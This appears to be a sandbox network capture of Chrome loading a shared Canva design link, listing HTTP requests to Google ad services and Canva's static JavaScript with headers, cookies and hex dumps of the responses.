                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC581INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                    set-cookie: FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    84192.168.2.449840142.250.181.34443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1066OUTGET /ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a HTTP/1.1
                                                                                                                                                                                                                                                    Host: adservice.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:45 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    85192.168.2.449841172.217.19.228443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC2487OUTGET /pagead/1p-conversion/804757079/?random=960307558&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20297%3Bevent_id%3D1734644380069_173464376514863%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_doctype_id%3DTAFJi5FXMSs%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l [TRUNCATED]
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Attribution-Reporting-Eligible: trigger;navigation-source, event-source
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:45 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    86192.168.2.449843104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC929OUTGET /web/a69e6dc612146c74.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:45 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 4342
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a7f1b6f1879-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71074
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "09b8a90f25c53311a2c0d17023a001b7"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:31 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: 0hL2CFwT3rVOOsRYjkvtIjeghCQBxzxSF8MipqgfprvypBOdLo6TjvFspwe+F1RsRVPNsgawQUY=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYPZY9EMWDF525G
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: SglXulJjhJgla2g3vgqWvCsU5BtHOK2H
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4e 52 56 71 5a 6f 37 6b 63 4a 4b 4d 35 75 53 35 44 67 34 7a 37 45 4f 41 37 67 4f 5a 4b 63 38 65 61 71 39 45 7a 6c 5a 4b 61 6e 30 7a 57 72 48 38 65 57 62 31 6f 4e 76 77 6a 38 31 72 32 49 49 41 38 63 4d 51 33 78 37 56 6c 4d 57 76 6c 5a 79 58 46 4a 6f 42 46 34 63 56 61 54 25 32 46 67 66 46 71 54 76 65 69 4e 51 4d 77 25 32 46 6d 72 4f 4c 31 6b 62 59 25 32 42 54 4e 46 35 68 6b 69 50 5a 38 75 69 44 4d 33 49 66 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NRVqZo7kcJKM5uS5Dg4z7EOA7gOZKc8eaq9EzlZKan0zWrH8eWb1oNvwj81r2IIA8cMQ3x7VlMWvlZyXFJoBF4cVaT%2FgfFqTveiNQMw%2FmrOL1kbY%2BTNF5hkiPZ8uiDM3Ifk%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1199INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 37 36 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 37 33 32 32 31 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5769],{/***/ 732219:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 65 61 67 65 72 6c 79 5f 69 6e 76 6f 6b 65 5f 73 63 68 65 64 75 6c 65 64 5f 76 69 65 77 5f 64 75 72 61 74 69 6f 6e 22 2c 6e 65 77 20 4d 61 70 28 5b 5b 22 73 6f 75 72 63 65 22 2c 67 5d 5d 29 29 3b 64 28 66 29 7d 7d 7d 7d 2c 7a 71 62 3d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 61 2e 54 61 2e 6e 6f 77 28 29 2d 63 2e 74 45 61 3b 69 66 28 30 3d 3d 3d 64 29 72 65 74 75 72 6e 20 63 2e 61 64 2e 61 62 6f 72 74 28 29 2c 47 61 28 22 53 55 53 50 45 43 54 45 44 5f 53 4c 45 45 50 22 29 3b 69 66 28 30 3e 64 29 72 65 74 75 72 6e 20 63 2e 61 64 2e 65 6e 64 28 22 65 72 72 6f 72 22 2c 0a 6e 65 77 20 4d 61 70 28 5b 5b 22 65 72 72 6f 72 5f 72 65 61 73 6f 6e 22 2c 22 49 4e 56 41 4c 49 44 5f 49 4e 54 45 52 41 43 54 49 4f 4e 5f 54 49 4d
                                                                                                                                                                                                                                                    Data Ascii: eagerly_invoke_scheduled_view_duration",new Map([["source",g]]));d(f)}}}},zqb=async function(a,b,c){var d=a.Ta.now()-c.tEa;if(0===d)return c.ad.abort(),Ga("SUSPECTED_SLEEP");if(0>d)return c.ad.end("error",new Map([["error_reason","INVALID_INTERACTION_TIM
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 2c 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 66 29 3b 72 65 74 75 72 6e 28 29 3d 3e 7b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 6f 69 6e 74 65 72 6d 6f 76 65 22 2c 63 2c 64 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 6f 69 6e 74 65 72 64 6f 77 6e 22 2c 63 2c 64 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 63 2c 64 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 66 6f 63 75 73 22 2c 63 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 62 29 3b 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                                                    Data Ascii: ,e);document.addEventListener("visibilitychange",f);return()=>{a.removeEventListener("pointermove",c,d);a.removeEventListener("pointerdown",c,d);a.removeEventListener("keydown",c,d);a.removeEventListener("focus",c);a.removeEventListener("blur",b);document
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC405INData Raw: 44 41 54 45 22 29 2c 62 2e 77 71 3d 76 6f 69 64 20 30 29 2c 48 33 28 74 68 69 73 2c 62 29 29 29 7d 3b 74 68 69 73 2e 68 66 3d 61 2e 68 66 3b 74 68 69 73 2e 46 79 3d 61 2e 46 79 3b 74 68 69 73 2e 44 46 3d 61 2e 44 46 3b 74 68 69 73 2e 77 43 3d 61 2e 77 43 3b 74 68 69 73 2e 54 61 3d 61 2e 54 61 3b 74 68 69 73 2e 68 68 3d 61 2e 68 68 3b 74 68 69 73 2e 4c 3d 61 2e 4c 3b 74 68 69 73 2e 52 62 3d 61 2e 52 62 7d 7d 3b 76 61 72 20 4a 71 62 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6c 66 61 3d 61 7d 7d 3b 5f 5f 63 2e 46 59 3d 7b 43 72 61 3a 7b 45 4f 61 3a 30 2c 6f 4f 61 3a 31 2c 66 74 61 3a 32 7d 7d 3b 5f 5f 63 2e 46 59 2e 6c 66 61 3d 48 71 62 3b 5f 5f 63 2e 46 59 2e 6c 54 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75
                                                                                                                                                                                                                                                    Data Ascii: DATE"),b.wq=void 0),H3(this,b)))};this.hf=a.hf;this.Fy=a.Fy;this.DF=a.DF;this.wC=a.wC;this.Ta=a.Ta;this.hh=a.hh;this.L=a.L;this.Rb=a.Rb}};var Jqb=class{constructor(a){this.lfa=a}};__c.FY={Cra:{EOa:0,oOa:1,fta:2}};__c.FY.lfa=Hqb;__c.FY.lTa=function(a){retu


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    87192.168.2.449844104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC929OUTGET /web/ed3781c5c1cc0c75.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:45 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 11354
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a7f1b46efa1-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71074
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "a5cbefa28174bdea24cca2d8cc328244"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:31 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: bFGIDFpfKn7JeSN8lJG0OUSRlZbctgvMRKom4UgqGR+SwbpiOPVsRnw/3xH9aMD0MGUlK7RziwU=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYW0HTB9JAEWM41
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: KynQya55P0qdCBIQgRV3BWz2bxQLvZd2
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC358INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 50 25 32 42 50 33 43 47 62 35 50 7a 33 50 77 79 62 48 4f 45 35 68 65 4e 51 79 49 6e 38 61 76 4e 4a 49 64 4c 65 30 70 7a 35 6d 37 61 36 25 32 42 41 77 59 52 65 6a 54 59 32 49 54 4e 52 45 6d 65 25 32 42 30 56 4c 44 25 32 46 54 4e 6e 25 32 42 39 71 77 43 51 52 44 4c 59 49 25 32 46 4c 38 47 25 32 46 35 7a 4c 4d 6c 57 43 36 75 68 78 53 6e 79 32 42 54 4f 7a 37 65 35 55 44 41 49 49 4b 73 50 72 63 69 56 4c 72 53 32 4e 32 61 30 76 69 58 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2BP3CGb5Pz3PwybHOE5heNQyIn8avNJIdLe0pz5m7a6%2BAwYRejTY2ITNREme%2B0VLD%2FTNn%2B9qwCQRDLYI%2FL8G%2F5zLMlWC6uhxSny2BTOz7e5UDAIIKsPrciVLrS2N2a0viXY%3D"}],"group":"cf-nel","max_age
